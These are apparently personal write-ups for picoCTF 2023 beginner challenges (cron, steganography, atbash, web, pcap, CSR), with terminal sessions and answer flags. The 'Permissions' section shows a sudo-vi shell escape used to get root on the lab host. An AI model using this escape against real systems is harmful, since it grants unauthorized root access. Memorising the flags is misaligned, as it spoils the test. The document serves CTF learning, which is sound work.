picoCTF2023
chrono
| | 100 points
Tags: General Skillslinux
AUTHOR: MUBARAK MIKAIL
Description
How to automate tasks to run at intervals on linux servers?
Additional details will be available after launching your challenge instance.
picoCTF{Sch3DUL7NG_T45K3_L1NUX_abe2c490}
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ ssh picoplayer@saturn.picoctf.net -p 64468
picoplayer@challenge:~$ crontab -e
no crontab for picoplayer - using an empty one
update-alternatives: error: no alternatives for editor
/usr/bin/sensible-editor: 25: editor: not found
/usr/bin/sensible-editor: 28: nano: not found
/usr/bin/sensible-editor: 31: nano-tiny: not found
/usr/bin/sensible-editor: 34: vi: not found
Couldn't find an editor!
Set the $EDITOR environment variable to your desired editor.
crontab: "/usr/bin/sensible-editor" exited with status 1
picoplayer@challenge:~$ sudo crontab -e
[sudo] password for picoplayer:
picoplayer is not in the sudoers file. This incident will be reported.
picoplayer@challenge:~$ cd /etc
picoplayer@challenge:/etc$ cat crontab
# picoCTF{Sch3DUL7NG_T45K3_L1NUX_abe2c490}
findme
| | 100 points
Tags: Web Exploitation
AUTHOR: GEOFFREY NJOGU
Description
Help us test the form by submiting the username as test and password as test!
Additional details will be available after launching your challenge instance.
picoCTF{proxies_all_the_way_599a80c2}
Go to the site, follow the instructions.
Poked around the site, but could not find anything.
Use Developer Tool, capture traffic from the first page to login success, you see there are two entried with no response:
http://saturn.picoctf.net:56021/next-page/id=cGljb0NURntwcm94aWVzX2Fs
http://saturn.picoctf.net:56021/next-page/id=bF90aGVfd2F5XzU5OWE4MGMyfQ==
The values of id look like base64 encoded. Decode these two id values and you get the flag.
hideme
| | 100 points
Tags: Forensicssteganography
AUTHOR: GEOFFREY NJOGU
Description
Every file gets a flag.The SOC analyst saw one image been sent back and forth between two people. They decided to investigate and found out that there was more than what meets the eye here.
picoCTF{Hidding_An_imag3_within_@n_ima9e_c31884c7}
Try online tool first.
Looks binwalk found some hidden file.
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ binwalk flag.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 512 x 504, 8-bit/color RGBA, non-interlaced
41 0x29 Zlib compressed data, compressed
39739 0x9B3B Zip archive data, at least v1.0 to extract, name: secret/
39804 0x9B7C Zip archive data, at least v2.0 to extract, compressed size: 2832, uncompressed size: 2984, name: secret/flag.png
42871 0xA777 End of Zip archive, footer length: 22
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ binwalk -e flag.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 512 x 504, 8-bit/color RGBA, non-interlaced
41 0x29 Zlib compressed data, compressed
39739 0x9B3B Zip archive data, at least v1.0 to extract, name: secret/
39804 0x9B7C Zip archive data, at least v2.0 to extract, compressed size: 2832, uncompressed size: 2984, name: secret/flag.png
42871 0xA777 End of Zip archive, footer length: 22
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ ls
aaa.txt atbash.jpg encrypted.txt flag.png _flag.png.extracted
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ cd _flag.png.extracted
┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted]
└─$ ls
29 29.zlib 9B3B.zip secret
┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted]
└─$ cd secret
┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted/secret]
└─$ ls
flag.png
HideToSee
| | 100 points
Tags: Cryptography
AUTHOR: SUNDAY JACOB NWANYIM
Description
How about some hide and seek heh?Look at this image here.
picoCTF{atbash_crack_6c4bcb08}
Tried online tool:
Online steg site with all the tools together
It has strings, exiftool and some others. The simple ones didn't work.
Try steghide.
Try password atbash with steghide and it does not work.
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ steghide info atbash.jpg
"atbash.jpg":
format: jpeg
capacity: 2.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
Try without password and it worked.
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ steghide info atbash.jpg
"atbash.jpg":
format: jpeg
capacity: 2.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "encrypted.txt":
size: 31.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
Extract file without password.
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ steghide extract -sf atbash.jpg
Enter passphrase:
wrote extracted data to "encrypted.txt".
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ cat encrypted.txt
krxlXGU{zgyzhs_xizxp_6x4yxy08}
Notice the image says atbash. So decode this string with atbash decoder:
picoCTF{atbash_crack_6c4bcb08}
MatchTheRegex
| | 100 points
Tags: Web Exploitation
AUTHOR: SUNDAY JACOB NWANYIM
Description
How about trying to match a regular expressionThe website is running here.
picoCTF{succ3ssfully_matchtheregex_18b306a0}
First try search with ***, get an error.
Then try search with picoCTF*** and it worked
money-ware
|
| 100 points
Tags:
Author: Juni19
Description
Flag format: picoCTF{Malwarename} The first letter of the malware name should be capitalized and the rest lowercase. Your friend just got hacked and has been asked to pay some bitcoins to 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is going on and asks you for advice. Can you identify what malware he’s being a victim of?
Just google
"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX malware"
You will find news that points to a malware named Petya.
picoCTF{Petya}
PcapPoisoning
| | 100 points
Tags: Forensicspcap
AUTHOR: MUBARAK MIKAIL
Description
How about some hide and seek heh?Download this file and find the flag.
Open the file in wireshark.
Search key word pico. And you will find it.
picoCTF{P64P_4N4L7S1S_SU55355FUL_ba1a6097}
Permissions
| | 100 points
Tags: General Skillsvim
AUTHOR: GEOFFREY NJOGU
Description
Can you read files in the root file?The system admin has provisioned an account for you on the main server:ssh -p 58850 picoplayer@saturn.picoctf.netPassword: cbjrrAIyO4Can you login and read the root file?
┌──(kali㉿kali)-[~/Desktop/picoCTF]
└─$ ssh -p 58850 picoplayer@saturn.picoctf.net
The authenticity of host '[saturn.picoctf.net]:58850 ([3.12.65.157]:58850)' can't be established.
ED25519 key fingerprint is SHA256:oCgGxVpfRH0kgCbgMYs6D+4eE2zVsDCCjmEzmEiK2iQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[saturn.picoctf.net]:58850' (ED25519) to the list of known hosts.
picoplayer@saturn.picoctf.net's password:
picoplayer@challenge:~$ cd /root
-bash: cd: /root: Permission denied
picoplayer@challenge:~$ whoami
picoplayer
picoplayer@challenge:~$ sudo -i
[sudo] password for picoplayer:
Sorry, user picoplayer is not allowed to execute '/bin/bash' as root on challenge.
picoplayer@challenge:~$ sudo -l
[sudo] password for picoplayer:
Matching Defaults entries for picoplayer on challenge:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User picoplayer may run the following commands on challenge:
(ALL) /usr/bin/vi
First see if you can use vi to open the flag.txt file under /root.
picoplayer@challenge:~$ vi /root/flag.txt
picoplayer@challenge:~$ sudo vi /root/flag.txt
Nothing showed up.
So you can run vi with sudo permission, check what command can be used to get a root shell from vi:
https://gtfobins.github.io/gtfobins/vi/#sudo
picoplayer@challenge:~$ sudo vi -c ':!/bin/sh' /dev/null
# cd /root
# ls
flag.txt
# cat flag.txt
# ls -al
total 16
drwx------ 1 root root 38 Mar 15 08:17 .
drwxr-xr-x 1 root root 63 Mar 15 08:14 ..
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 35 Mar 15 02:46 .flag.txt
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 707 Mar 15 08:17 .viminfo
-rw-r--r-- 1 root root 0 Mar 15 08:17 flag.txt
# cat .flag.txt
picoCTF{uS1ng_v1m_3dit0r_27f6a05a}
#
ReadMyCert
| | 100 points
Tags: Cryptography
AUTHOR: SUNDAY JACOB NWANYIM
Description
How about we take you on an adventure on exploring certificate signing requestsTake a look at this CSR file here.
Download the CSR file, try base64 decoder. So just decode the file and you will get the flag. If you want to read all the contents, try a CSR decoder https://www.sslshopper.com/csr-decoder.html . The flag is the common name of the cert.
picoCTF{read_mycert_12eba7f1}